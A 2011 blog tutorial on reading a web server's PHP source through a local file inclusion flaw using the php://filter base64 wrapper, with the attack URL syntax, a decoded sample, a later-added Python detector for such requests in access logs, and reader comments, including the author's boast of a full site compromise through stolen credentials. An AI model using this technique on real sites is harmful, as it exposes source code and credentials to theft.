Thursday, December 8, 2011

LFI TIP: HOW TO READ SOURCE CODE USING PHP://FILTER

OK so you won't be able to shell a site every time you find an LFI vulnerability. That being said, it doesn't mean we can't work a few other methods and still manage to walk away with some valuable information. Today I will briefly show you another method that can be leveraged when you find an LFI vulnerability to get the job done, through the use of php:// filters.

OK so you have found your LFI link but can't get access to logs, or conditions aren't right for gaining shell access.

OK, well before you give up and report that the site is only mildly vulnerable, we will test further to see if we can read any of the target server's files. We will use a method to view the source of any PHP file through the PHP filter wrapper “php://filter/convert.base64-encode/resource=”, which has been available since PHP 5.0.0. The syntax works like this:

SYNTAX:
http://www.site.com/vulnpage.php?page=php://filter/convert.base64-encode/resource=FileNameToRead

I should note that in most cases the include function will append “.php” to your FileNameToRead, BUT in some cases you may need to include the file extension (.php) in your injection yourself. This method makes PHP base64-encode the target file as it is read, so what the include receives is plain base64 text with no PHP tags in it: nothing gets executed, and the encoded contents are simply returned to us in the page. We can then decode the result with our favourite tool and obtain the source code of the PHP files on the target site.

RETURNED RESULT:
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMC8vRU4iPgo8aHRtbD4KPGhlYWQ+CiAgPHRpdGxlPk15IEZpcnN0IFRlc3QgU2l0ZTwvdGl0bGU+CiAgPE1FVEEgSFRUUC1FUVVJVj0iUmVmcmVzaCIgQ09OVEVOVD0iMTsgVVJMPWh0dHA6Ly90ZXN0c2l0ZS5jb20vaW5kZXgucGhwIj4KPC9oZWFkPgo8Ym9keT4KPGRpdiBhbGlnbj0iY2VudGVyIj4KICAgIElmIHlvdSBhcmUgbm90IHJlZGlyZWN0ZWQgcGxlYXNlIGNsaWNrIDxhIGhyZWY9IiBodHRwOi8vdGVzdHNpdGUuY29tL2luZGV4LnBocCAiPmhlcmU8L2E+Lgo8L2Rpdj4KPC9ib2R5Pgo8L2h0bWw+

If we base64 decode the results, we see the actual source code:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
  <title>My First Test Site</title>
  <META HTTP-EQUIV="Refresh" CONTENT="1; URL=http://testsite.com/index.php">
</head>
<body>
<div align="center">
    If you are not redirected please click <a href=" http://testsite.com/index.php ">here</a>.
</div>
</body>
</html>

You can now go through the source code to review it for further code exploits, SQL injections, or enumerate configuration files and try to grab juicy connection credentials. The options are up to you, but I thought I would add this to the LFI series since I have not seen it discussed very much. Hope you were able to follow along, and until next time… Enjoy!
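From the defending side, the same trick is easy to spot in web server access logs, because the wrapper string has to travel in the query string. The following is an added example (not code from the original post) that scans Apache combined-format log lines for query parameters carrying php://filter, URL-decoding repeatedly so that double-encoded variants are caught too; the log lines and hostnames are constructed for the demonstration.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Constructed Apache combined-format access log lines (sample data, not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [08/Dec/2011:10:00:01 +0000] "GET /vulnpage.php?page=about HTTP/1.1" 200 512
203.0.113.9 - - [08/Dec/2011:10:00:02 +0000] "GET /vulnpage.php?page=php://filter/convert.base64-encode/resource=index HTTP/1.1" 200 1024
203.0.113.9 - - [08/Dec/2011:10:00:03 +0000] "GET /vulnpage.php?page=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dconfig HTTP/1.1" 200 2048
203.0.113.9 - - [08/Dec/2011:10:00:04 +0000] "GET /vulnpage.php?page=php%253A%252F%252Ffilter%252Fresource%253Dindex HTTP/1.1" 200 512
"""

# Minimal parser for the common/combined log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+)'
)

# The wrapper discussed above; matched case-insensitively anywhere in the decoded value.
WRAPPER_RE = re.compile(r'php://filter', re.IGNORECASE)


def decode_fully(value, max_rounds=3):
    """URL-decode until the value stops changing, so %253A (double-encoded ':') is unwrapped."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_wrapper_requests(log_text):
    """Return (client_ip, parameter_name, decoded_value) for every parameter using php://filter."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        query = urlsplit(m.group('target')).query
        # parse_qsl decodes one layer of URL encoding; decode_fully handles any further layers.
        for name, raw in parse_qsl(query, keep_blank_values=True):
            value = decode_fully(raw)
            if WRAPPER_RE.search(value):
                hits.append((m.group('ip'), name, value))
    return hits


if __name__ == '__main__':
    for ip, param, value in find_wrapper_requests(SAMPLE_LOG):
        print(f'{ip} param={param!r} value={value!r}')
```

Pointing the same function at a real log (for example by reading the file and passing its contents) gives a quick triage list; the benign `page=about` request is not reported, while both the plain and the URL-encoded wrapper requests are.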

7 comments:

  1. I have no words for this great post, such awesome information I got gathered. Thanks to the author.

    1. Glad it was helpful for at least one person. This method saved me the other day on a job when I thought I had no options left, and voila, I was able to read the configuration file in which the admin re-used credentials, which allowed full compromise of the site and database as a result :P

  2. Hi HR, at first I wanna thank you for such a great job and tutorials.
    By the way, I still have a little issue with the php://filter.
    How can I use a filter such as php://filter/convert.base64-encode/resource=whatever.file when the programmer used

    $page = $_GET['page'];
    include('doc/' . $page);

    for example??
    Thanks again ;)

    1. Thanks for the kind feedback, always appreciated! Unfortunately you can't bypass this situation to my knowledge. When you're facing the prefixed directory it kills any chance of using the alternative data stream attacks :(

  3. I am having these errors. Please tell me what they are and how they occurred.

    Warning: include() [function.include]: Failed opening 'php://filter/convert.base64-encode/resource=facebookhacking.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/a9546567/public_html/ethipedia/index.php on line 7

  4. Try it with the full path to the file you want (i.e. /home/a9546567/public_html/ethipedia/facebookhacking, with no .php due to the appendage applied). Enjoi
